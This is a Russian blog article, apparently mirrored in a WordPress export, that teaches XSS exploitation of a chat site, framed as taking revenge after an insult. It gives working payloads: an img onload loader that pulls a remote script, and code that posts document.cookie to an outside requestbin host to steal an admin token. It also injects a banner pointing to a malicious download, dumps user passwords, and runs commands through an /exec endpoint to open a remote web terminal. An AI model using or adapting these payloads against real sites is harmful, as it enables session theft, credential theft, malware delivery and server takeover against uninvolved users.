{"id":296129,"date":"2019-12-20T15:00:22","date_gmt":"2019-12-20T15:00:22","guid":{"rendered":"http:\/\/savepearlharbor.com\/?p=296129"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T21:00:00","slug":"","status":"publish","type":"post","link":"https:\/\/savepearlharbor.com\/?p=296129","title":{"rendered":"\u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f xss \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438"},"content":{"rendered":"\n<div class=\"post__text post__text-html js-mediator-article\" id=\"post-content-body\" data-io-article-url=\"https:\/\/habr.com\/ru\/post\/481338\/\">\n<p>\u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f xss \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438<\/p>\n<p>  <\/p>\n<p><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/getpro\/habr\/post_images\/7be\/d85\/4de\/7bed854de434dd65014dc58603b8acfc.jpg\"><\/p>\n<p>  <\/p>\n<p>\u0414\u0430\u043d\u043d\u0430\u044f \u0441\u0442\u0430\u0442\u044c\u044f \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442 \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0438\u044e xss \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438:<\/p>\n<p>  <\/p>\n<ul>\n<li>\u041a\u0440\u0430\u0436\u0430 \u0442\u043e\u043a\u0435\u043d\u0430<\/li>\n<li>\u041a\u0440\u0430\u0436\u0430 \u043e\u043a\u0440\u0443\u0436\u0435\u043d\u0438\u044f<\/li>\n<li>\u0418\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u043d\u0442\u0435\u043d\u0442\u0430 \u0441\u0430\u0439\u0442\u0430<\/li>\n<li>\u041f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u0445\u043e\u0441\u0442\u0438\u043d\u0433\u0430<a name=\"habracut\"><\/a><\/li>\n<\/ul>\n<p>  <\/p>\n<h2 id=\"predystoriya\">\u041f\u0440\u0435\u0434\u044b\u0441\u0442\u043e\u0440\u0438\u044f<\/h2>\n<p>  <\/p>\n<p><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/webt\/e7\/nl\/y_\/e7nly_jpaknum23kzwbhqeo7ryu.png\"><\/p>\n<p>  <\/p>\n<p>\u0418\u0442\u0430\u043a, \u0432\u044b \u0437\u0430\u0448\u043b\u0438 \u043d\u0430 \u0447\u0430\u0442, \u0432\u0430\u0441 \u043e\u0441\u043a\u043e\u0440\u0431\u0438\u043b\u0438, \u0438 \u0442\u0435\u043f\u0435\u0440\u044c \u0432\u044b \u0445\u043e\u0442\u0438\u0442\u0435 \u043e\u0442\u043e\u043c\u0441\u0442\u0438\u0442\u044c. \u041a\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u0437\u0430\u043c\u0435\u0442\u0438\u0442\u044c \u0438\u0437 \u0434\u0438\u0430\u043b\u043e\u0433\u0430 \u043c\u043e\u0436\u043d\u043e \u043b\u0435\u0433\u043a\u043e \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u044c html, \u0447\u0442\u043e \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0438\u0434\u0435\u0430\u043b\u044c\u043d\u043e\u0439 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c\u044e \u0434\u043b\u044f xss, \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u0441\u0442\u0438 \u0432\u044b \u0432\u0440\u044f\u0434 \u043b\u0438 \u0437\u0430\u043c\u0435\u0442\u0438\u0442\u0435 \u0442\u0430\u043a\u0443\u044e \u043b\u0430\u0437\u0435\u0439\u043a\u0443.<\/p>\n<p>  <\/p>\n<h2 id=\"zapuskaem-skript\">\u0417\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u043c \u0441\u043a\u0440\u0438\u043f\u0442<\/h2>\n<p>  <\/p>\n<p>\u041c\u044b \u0438\u043c\u0435\u0435\u043c \u0447\u0430\u0442 \u0441 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c\u044e \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0438 HTML. \u0422\u0430\u043a \u0447\u0442\u043e \u0434\u0430\u0432\u0430\u0439\u0442\u0435 \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u043c \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c xss <code>console.log('XSS stage 0')<\/code> \u0438 \u043d\u0435 \u0441\u0440\u0430\u0431\u043e\u0442\u0430\u043b\u043e.<br \/>  \u0412 \u0447\u0451\u043c \u0436\u0435 \u0434\u0435\u043b\u043e? Chromium \u0438 firefox \u0438\u0433\u043d\u043e\u0440\u0438\u0440\u0443\u044e\u0442 \u0441\u043a\u0440\u0438\u043f\u0442\u044b \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0435 \u0447\u0435\u0440\u0435\u0437 <code>innerHTML<\/code>.<br \/>  \u041e\u043a \u043f\u0440\u043e\u0431\u0443\u0435\u043c \u0432\u0442\u043e\u0440\u043e\u0439 \u043f\u043e\u0434\u0445\u043e\u0434 <\/p>\n<p>  <\/p>\n<pre><code class=\"html\">&lt;img src=\"https:\/\/picsum.photos\/200\/200\" onload=\"console.log('XSS')\" \/&gt;<\/code><\/pre>\n<p>  <\/p>\n<p>\u0412 \u043a\u043e\u043d\u0441\u043e\u043b\u0438 \u0432\u044b\u0432\u0435\u043b\u043e\u0441\u044c XSS \u0437\u043d\u0430\u0447\u0438\u0442 \u043a\u043e\u0434 \u0441\u0440\u0430\u0431\u043e\u0442\u0430\u043b<\/p>\n<p>  <\/p>\n<p>\u0422\u0435\u043f\u0435\u0440\u044c \u043d\u0430 pastebin \u0441\u043e\u0437\u0434\u0430\u0434\u0438\u043c \u0441\u043a\u0440\u0438\u043f\u0442 \u0441 \u043a\u043e\u0442\u043e\u0440\u044b\u043c \u043c\u044b \u0438 \u0431\u0443\u0434\u0435\u043c \u0438\u0433\u0440\u0430\u0442\u044c\u0441\u044f<br \/>  \u041a\u043e\u043d\u0442\u0435\u043d\u0442 \u0441\u043a\u0440\u0438\u043f\u0442\u0430:<\/p>\n<p>  <\/p>\n<pre><code class=\"javascript\">console.log('Script loaded')<\/code><\/pre>\n<p>  <\/p>\n<p>\u0414\u043b\u044f \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u0441\u043a\u0440\u0438\u043f\u0442\u0430 \u0432 \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u0435 onload \u043f\u0440\u043e\u043f\u0438\u0448\u0435\u043c:<\/p>\n<p>  <\/p>\n<pre><code class=\"javascript\">s=document.createElement('script');s.src='https:\/\/pastebin.com\/raw\/[YOUR_PASTE_ID]';document.body.appendChild(s)<\/code><\/pre>\n<p>  <\/p>\n<p>\u0418 \u0442\u0435\u043f\u0435\u0440\u044c \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u044f <\/p>\n<p>  <\/p>\n<pre><code class=\"html\">&lt;img src=\"https:\/\/picsum.photos\/200\/200\" onload=\"s=document.createElement('script');s.src='https:\/\/pastebin.com\/raw\/[YOUR_PASTE_ID]';document.body.appendChild(s)\" \/&gt;<\/code><\/pre>\n<p>  <\/p>\n<p>\u0432\u0441\u0435 \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u0435\u043b\u0438 \u043f\u0440\u043e\u0441\u043c\u043e\u0442\u0440\u044f\u0442 \u043a\u0430\u0440\u0442\u0438\u043d\u043a\u0443 \u0438 \u0437\u0430\u043f\u0443\u0441\u0442\u044f\u0442 \u0441\u043a\u0440\u0438\u043f\u0442<\/p>\n<p>  <\/p>\n<h2 id=\"grabim-kuki\">\u0413\u0440\u0430\u0431\u0438\u043c \u043a\u0443\u043a\u0438<\/h2>\n<p>  <\/p>\n<p>\u0421 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u043e\u0439 \u0441\u043a\u0440\u0438\u043f\u0442\u0430 \u043c\u044b \u0440\u0430\u0437\u043e\u0431\u0440\u0430\u043b\u0438\u0441\u044c \u0442\u0435\u043f\u0435\u0440\u044c \u043f\u0440\u0438\u0441\u0442\u0443\u043f\u0438\u043c \u043a \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438. \u0412\u043e-\u043f\u0435\u0440\u0432\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0435 \u043d\u0443\u0436\u043d\u043e \u043a\u0443\u0434\u0430-\u0442\u043e \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u044c \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0441\u044f requestbin <\/p>\n<p>  <\/p>\n<pre><code class=\"javascript\">\/\/ \u041f\u0440\u0438\u043c\u0435\u0440 \u043a\u043e\u0434\u0430 \u0434\u043b\u044f \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0438 \u043a\u0430\u043a\u0438\u0445-\u0442\u043e \u0434\u0430\u043d\u043d\u044b\u0445 const headers = new Headers() headers.append(\"Content-Type\", \"application\/json\")  const body = { \"name\": \"Yoda\" }  const options = {   method: \"POST\",   headers,   mode: \"cors\",   body: JSON.stringify(body), }  fetch(\"[URL]\", options)<\/code><\/pre>\n<p>  <\/p>\n<p>\u041d\u043e \u043f\u0440\u043e\u0441\u0442\u043e \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0442\u044c \u043e\u0434\u0438\u043d \u0438 \u0442\u043e\u0436\u0435 \u0442\u0435\u043a\u0441\u0442 \u043d\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e, \u0434\u0430\u0432\u0430\u0439\u0442\u0435 \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u043c \u043a\u0443\u043a\u0438<\/p>\n<p>  <\/p>\n<pre><code class=\"javascript\">\/\/ \u041f\u0440\u0438\u043c\u0435\u0440 \u043a\u043e\u0434\u0430 \u0434\u043b\u044f \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0438 \u043a\u0430\u043a\u0438\u0445-\u0442\u043e \u0434\u0430\u043d\u043d\u044b\u0445 const headers = new Headers() headers.append(\"Content-Type\", \"application\/json\")  const body = { \"cookies\": document.cookie }  const options = {   method: \"POST\",   headers,   mode: \"cors\",   body: JSON.stringify(body), }  fetch(\"https:\/\/en9uiweslksnu.x.pipedream.net\", options)<\/code><\/pre>\n<p>  <\/p>\n<p>\u0412 \u043a\u0443\u043a\u0430\u0445 \u043b\u0435\u0436\u0430\u0442 \u0442\u043e\u043a\u0435\u043d\u044b \u0434\u043b\u044f \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f.<br \/>  \u0412 requestbin \u043c\u044b \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0434\u0432\u0430 \u0437\u0430\u043f\u0440\u043e\u0441\u0430 \u0441 \u0434\u0432\u0443\u043c\u044f \u0442\u043e\u043a\u0435\u043d\u0430\u043c\u0438:<br \/>  <code>-1067197389<\/code><br \/>  <code>1679211939<\/code><br \/>  \u0422\u0430\u043a \u043a\u0430\u043a \u043c\u043e\u0439 \u0442\u043e\u043a\u0435\u043d <code>1679211939<\/code><br \/>  \u0417\u043d\u0430\u0447\u0438\u0442 \u0442\u043e\u043a\u0435\u043d \u0430\u0434\u043c\u0438\u043d\u0430 <code>-1067197389<\/code><br \/>  \u0417\u0430\u043c\u0435\u043d\u0438\u0432 \u0441\u0432\u043e\u0439 \u0442\u043e\u043a\u0435\u043d \u043d\u0430 \u0442\u043e\u043a\u0435\u043d \u0430\u0434\u043c\u0438\u043d\u0430 \u043c\u044b \u0441\u043c\u043e\u0436\u0435\u043c \u043f\u0438\u0441\u0430\u0442\u044c \u043e\u0442 \u0435\u0433\u043e \u0438\u043c\u0435\u043d\u0438<\/p>\n<p>  <\/p>\n<h2 id=\"izmenenie-kontenta\">\u0418\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u043d\u0442\u0435\u043d\u0442\u0430<\/h2>\n<p>  <\/p>\n<p>\u041f\u0438\u0441\u0430\u0442\u044c \u043e\u0442 \u0438\u043c\u0435\u043d\u0438 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u0432\u0435\u0441\u0435\u043b\u043e, \u043d\u043e \u0434\u0430\u0432\u0430\u0439\u0442\u0435 \u043d\u0435\u043c\u043d\u043e\u0433\u043e \u0438\u0437\u043c\u0435\u043d\u0438\u043c \u043a\u043e\u043d\u0442\u0435\u043d\u0442 \u0441\u0430\u0439\u0442\u0430. \u0414\u043e\u0431\u0430\u0432\u0438\u0432 \u043a \u043d\u0430\u0448\u0435\u043c\u0443 \u0437\u043b\u043e\u0441\u0442\u043d\u043e\u043c\u0443 \u0441\u043a\u0440\u0438\u043f\u0442\u0443 \u0442\u0430\u043a\u0438\u0435 \u0441\u0442\u0440\u043e\u043a\u0438<\/p>\n<p>  <\/p>\n<pre><code class=\"javascript\">let d = document.createElement('div') d.innerHTML = `&lt;div style=\"position: fixed;top: 0;height: 20px;width: 100vw;color: white;text-align: center;background: purple;\" onclick=\"document.location='\/your_very_evil_program'\"&gt;Download new appliction&lt;\/div&gt;` document.body.appendChild(d)  document.getElementById('msgs').setAttribute('style', 'height: calc(100% - 60px);margin-top: 20px;') <\/code><\/pre>\n<p>  <\/p>\n<p><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/webt\/5i\/mv\/xm\/5imvxmzfwdefdkdj1cccoojtwvq.png\"><\/p>\n<p>  <\/p>\n<p>\u041f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e \u043a\u0430\u043a \u043c\u044b \u043e\u0442 \u0438\u043c\u0435\u043d\u0438 \u0430\u0434\u043c\u0438\u043d \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u043c \u0442\u0430\u043a\u0443\u044e \u0444\u043e\u0442\u043a\u0443, \u0443 \u0432\u0441\u0435\u0445 \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u0435\u043b\u0435\u0439 \u043f\u043e\u044f\u0432\u0438\u0442\u0441\u044f \u0431\u0430\u043d\u043d\u0435\u0440 \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u0440\u0438 \u043d\u0430\u0436\u0430\u0442\u0438\u0438 \u0432\u0435\u0434\u0451\u0442 \u043d\u0430 \u043d\u0430\u0448 <code>\/your_very_evil_program<\/code><\/p>\n<p>  <\/p>\n<h2 id=\"krazha-okruzheniya\">\u041a\u0440\u0430\u0436\u0430 \u043e\u043a\u0440\u0443\u0436\u0435\u043d\u0438\u044f<\/h2>\n<p>  <\/p>\n<p>\u041f\u0440\u0438\u0448\u043b\u043e \u0432\u0440\u0435\u043c\u044f \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0430\u0434\u043c\u0438\u043d\u043a\u0435. \u0418 \u0442\u0430\u043a \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u043c \u0447\u0442\u043e \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u043f\u043e \u0430\u0434\u0440\u0435\u0441\u0443 <code>\/admin<\/code> \u0438 \u0442\u0430\u043c \u043d\u0430\u0441 \u0432\u0441\u0442\u0440\u0435\u0447\u0430\u0435\u0442 <code>ACCESS DENIED. BURN IN FIRE<\/code>, \u043b\u0430\u0434\u043d\u043e \u043f\u043e\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u043c \u0442\u043e\u043a\u0435\u043d \u0430\u0434\u043c\u0438\u043d\u0430 \u0432 \u043a\u0443\u043a\u0438. \u0418 \u043e\u043f\u044f\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u0437\u0430\u043f\u0440\u0435\u0449\u0451\u043d, \u0437\u043d\u0430\u0447\u0438\u0442 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u044f \u043f\u0440\u043e\u0445\u043e\u0434\u0438\u0442 \u043a\u0430\u043a\u0438\u043c-\u0442\u043e \u0434\u0440\u0443\u0433\u0438\u043c \u0441\u043f\u043e\u0441\u043e\u0431\u043e\u043c. \u0417\u043d\u0430\u0447\u0438\u0442 \u0437\u0430\u043f\u0440\u043e\u0441\u0438\u043c \u0430\u0434\u043c\u0438\u043d\u043a\u0443 \u043e\u0442 \u043c\u0430\u0448\u0438\u043d\u044b \u0430\u0434\u043c\u0438\u043d\u0430.<br \/>  \u0414\u043e\u0431\u0430\u0432\u0438\u043c \u0432 evil script:<\/p>\n<p>  <\/p>\n<pre><code class=\"javascript\">const  admin  =  await  (await fetch(\"\/admin\")).text()<\/code><\/pre>\n<p>  <\/p>\n<p>\u0418 \u0437\u0430\u0442\u0435\u043c \u043f\u0440\u0438 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0435 \u0432 \u0442\u0435\u043b\u043e \u0437\u0430\u043f\u0438\u0445\u043d\u0443\u0442\u044c \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 \u0430\u0434\u043c\u0438\u043d \u043c\u044b \u043f\u043e\u043b\u0443\u0447\u0438\u043c \u0434\u0430\u043d\u043d\u044b\u0435 <code>\/admin<\/code><\/p>\n<p>  <\/p>\n<p>\u041c\u044b \u043f\u043e\u043b\u0443\u0447\u0438\u043c \u043a\u043e\u0434 \u0430\u0434\u043c\u0438\u043d\u043a\u0438<\/p>\n<p>  <\/p>\n<pre><code class=\"html\">&lt;!DOCTYPE html&gt; &lt;html lang=\"en\"&gt;   &lt;head&gt;     &lt;meta charset=\"UTF-8\" \/&gt;     &lt;meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" \/&gt;     &lt;meta http-equiv=\"X-UA-Compatible\" content=\"ie=edge\" \/&gt;     &lt;title&gt;Admin&lt;\/title&gt;   &lt;\/head&gt;   &lt;body&gt;     Hello admin&lt;br \/&gt;     &lt;textarea id=\"users\" rows=\"20\" cols=\"100\"&gt;&lt;\/textarea&gt;&lt;br \/&gt;     &lt;button id=\"updUsers\"&gt;Update users&lt;\/button&gt;&lt;br \/&gt;&lt;br \/&gt;     &lt;script&gt;       let fetchUsrs = fetch(\"\/users\")         .then(e =&gt; e.text())         .then(e =&gt; (document.getElementById(\"users\").value = e));       document.getElementById(\"updUsers\").onclick = () =&gt; {         fetch(\"\/users\", {           body: JSON.stringify({             data: document.getElementById(\"users\").value.toString()           }),           headers: {             Accept: \"application\/json, text\/plain, *\/*\",             \"Content-Type\": \"application\/json\"           },           method: \"POST\"         }).then(fetchUsrs);       };       function toCmd(cmd) {         document.location =           \"http:\/\/\" + location.host + \"\/exec?cmd=\" + encodeURIComponent(cmd);       }     &lt;\/script&gt;     &lt;button onclick=\"toCmd('free --human')\"&gt;Check mem&lt;\/button&gt;     &lt;button onclick=\"toCmd('ps')\"&gt;Show procs&lt;\/button&gt;   &lt;\/body&gt; &lt;\/html&gt; <\/code><\/pre>\n<p>  <\/p>\n<p>\u0427\u0442\u043e \u0438\u0437 \u044d\u0442\u043e\u0433\u043e \u043c\u043e\u0436\u043d\u043e \u0438\u0437\u0432\u043b\u0435\u0447\u044c:<\/p>\n<p>  <\/p>\n<ol>\n<li>\u0415\u0441\u0442\u044c endpoint <code>\/users<\/code> \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0432\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u0435\u0442 \u0438 \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0435\u0442 \u044e\u0437\u0435\u0440\u043e\u0432<\/li>\n<li>\u0415\u0441\u0442\u044c endpoint <code>\/exec?cmd<\/code> \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0443<br \/>  \u041e\u0431\u0430 endpoint \u043d\u0435 \u0434\u0430\u044e\u0442 \u043d\u0430\u043c \u0434\u043e\u0441\u0442\u0443\u043f\u0430. \u0422\u0430\u043a \u0447\u0442\u043e \u043f\u043e\u043f\u0440\u043e\u0431\u0443\u0435\u043c \u0432\u044b\u0442\u0430\u0449\u0438\u0442\u044c <code>\/users<\/code><\/li>\n<\/ol>\n<p>  <\/p>\n<pre><code class=\"json\">{      \"admin\": \"VerySecurePassword\",      \"chiken\": \"COW+CHICKEN\",      \"user001\": \"agent007\",      \"justUser\": \"llkk\",      \"test\":\"12\"  }<\/code><\/pre>\n<p>  <\/p>\n<p>\u0418\u0442\u0430\u043a \u0442\u0435\u043f\u0435\u0440\u044c \u0443 \u043d\u0430\u0441 \u0435\u0441\u0442\u044c \u043f\u0430\u0440\u043e\u043b\u044c \u0438 \u043b\u043e\u0433\u0438\u043d \u0432\u0441\u0435\u0445 \u044e\u0437\u0435\u0440\u043e\u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0438 \u0442\u0435\u043f\u0435\u0440\u044c \u043b\u043e\u0433\u0438\u043d\u0438\u043c\u0441\u044f \u043f\u043e\u0434 \u0430\u0434\u043c\u0438\u043d\u043e\u043c, \u043c\u044b \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0430\u0434\u043c\u0438\u043d\u043a\u0435, \u0430 \u0432 \u043a\u0443\u043a\u0430\u0445 \u043f\u043e\u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f http-only \u043a\u0443\u043a \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0440\u0430\u0437\u0440\u0435\u0448\u0430\u0435\u0442 \u043a \u043d\u0435\u0439 \u0434\u043e\u0441\u0442\u0443\u043f<\/p>\n<p>  <\/p>\n<h2 id=\"poluchenie-dostupa-k-sisteme\">\u041f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u0441\u0438\u0441\u0442\u0435\u043c\u0435<\/h2>\n<p>  <\/p>\n<p>\u041a\u0430\u043a \u0432\u044b \u043f\u043e\u043c\u043d\u0438\u0442\u0435 \u0443 \u043d\u0430\u0441 \u0435\u0441\u0442\u044c endpoint \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u043a\u043e\u043c\u0430\u043d\u0434\u0443, \u0442\u0430\u043a \u0447\u0442\u043e \u0442\u0435\u043f\u0435\u0440\u044c \u043c\u044b \u043c\u043e\u0436\u0435\u043c \u0434\u0435\u043b\u0430\u0442\u044c \u0432\u0441\u0451 \u0447\u0442\u043e \u0445\u043e\u0442\u0438\u043c, \u043d\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u044d\u0442\u0438\u043c \u043d\u0435 \u043e\u0447\u0435\u043d\u044c \u0443\u0434\u043e\u0431\u043d\u043e \u0442\u0430\u043a \u0447\u0442\u043e \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u043c \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435 <a href=\"https:\/\/github.com\/cloudcmd\/gritty\">gritty<\/a><br \/>  \u0422\u0435\u043f\u0435\u0440\u044c \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0435\u043c <code>\/exec?cmd=npm%20i%20gritty%202%3E%261<\/code><br \/>  \u0418 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u043c <code>\/exec?cmd=node%20node_modules%2Fgritty%2Fbin%2Fgritty.js%20--port%208022<\/code><br \/>  \u0418 \u043f\u043e \u043f\u043e\u0440\u0442\u0443 8022 \u043d\u0430\u043c \u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u0441\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d \u0442\u0435\u0440\u043c\u0438\u043d\u0430\u043b gritty<\/p>\n<p>  <\/p>\n<h3 id=\"xss---krayne-opasen\">XSS \u2014 \u043a\u0440\u0430\u0439\u043d\u0435 \u043e\u043f\u0430\u0441\u0435\u043d<\/h3>\n<\/div>\n<p>               <script class=\"js-mediator-script\">!function(e){function t(t,n){if(!(n in e)){for(var r,a=e.document,i=a.scripts,o=i.length;o--;)if(-1!==i[o].src.indexOf(t)){r=i[o];break}if(!r){r=a.createElement(\"script\"),r.type=\"text\/javascript\",r.async=!0,r.defer=!0,r.src=t,r.charset=\"UTF-8\";var d=function(){var e=a.getElementsByTagName(\"script\")[0];e.parentNode.insertBefore(r,e)};\"[object Opera]\"==e.opera?a.addEventListener?a.addEventListener(\"DOMContentLoaded\",d,!1):e.attachEvent(\"onload\",d):d() } } }t(\"\/\/mediator.mail.ru\/script\/2820404\/\",\"_mediator\")}(window);<\/script>      <br \/> \u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b \u0441\u0442\u0430\u0442\u044c\u0438 <a href=\"https:\/\/habr.com\/ru\/post\/481338\/\"> https:\/\/habr.com\/ru\/post\/481338\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"\n<div class=\"post__text post__text-html js-mediator-article\" id=\"post-content-body\" data-io-article-url=\"https:\/\/habr.com\/ru\/post\/481338\/\">\n<p>\u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f xss \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438<\/p>\n<p>  <\/p>\n<p><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/getpro\/habr\/post_images\/7be\/d85\/4de\/7bed854de434dd65014dc58603b8acfc.jpg\"><\/p>\n<p>  <\/p>\n<p>\u0414\u0430\u043d\u043d\u0430\u044f \u0441\u0442\u0430\u0442\u044c\u044f \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442 \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0438\u044e xss \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438:<\/p>\n<p>  <\/p>\n<ul>\n<li>\u041a\u0440\u0430\u0436\u0430 \u0442\u043e\u043a\u0435\u043d\u0430<\/li>\n<li>\u041a\u0440\u0430\u0436\u0430 \u043e\u043a\u0440\u0443\u0436\u0435\u043d\u0438\u044f<\/li>\n<li>\u0418\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u043d\u0442\u0435\u043d\u0442\u0430 \u0441\u0430\u0439\u0442\u0430<\/li>\n<li>\u041f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u0445\u043e\u0441\u0442\u0438\u043d\u0433\u0430<br \/>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"class_list":["post-296129","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/296129","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=296129"}],"version-history":[{"count":0,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/296129\/revisions"}],"wp:attachment":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=296129"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=296129"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=296129"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}